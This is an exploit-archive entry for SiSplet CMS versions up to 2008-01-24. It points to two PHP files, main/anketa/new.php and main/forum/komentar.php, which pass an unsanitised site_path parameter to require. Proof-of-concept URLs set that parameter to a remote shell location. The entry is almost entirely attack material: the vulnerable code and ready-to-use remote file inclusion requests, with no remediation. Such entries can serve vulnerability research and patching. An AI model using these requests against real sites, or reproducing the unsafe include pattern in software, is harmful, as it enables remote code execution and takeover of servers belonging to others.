id: 10116
date: 12/07/2009
title: SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit
author: cr4wl3r
cves: 

==============================================================
SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit
==============================================================

########################################################################
#SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit
########################################################################
 
########################################################################
3rr0r 1: ./SiSplet-2008-01-24/main/anketa/new.php (line 3)
 
       <?php
           require_once($site_path.'main/anketa/class.php');
       ?>
 
3rr0r 2: ./SiSplet-2008-01-24/main/forum/komentar.php (line 3)
 
       <?php
           require($site_path.'main/forum/class.php');
       ?>
########################################################################
 
########################################################################
PoC  :   http://[target]/[path]/main/anketa/new.php?site_path=[Shell]
         http://[target]/[path]/main/forum/komentar.php?site_path=[Shell]
########################################################################
 
########################################################################



#  0day.today [2023-03-26]  #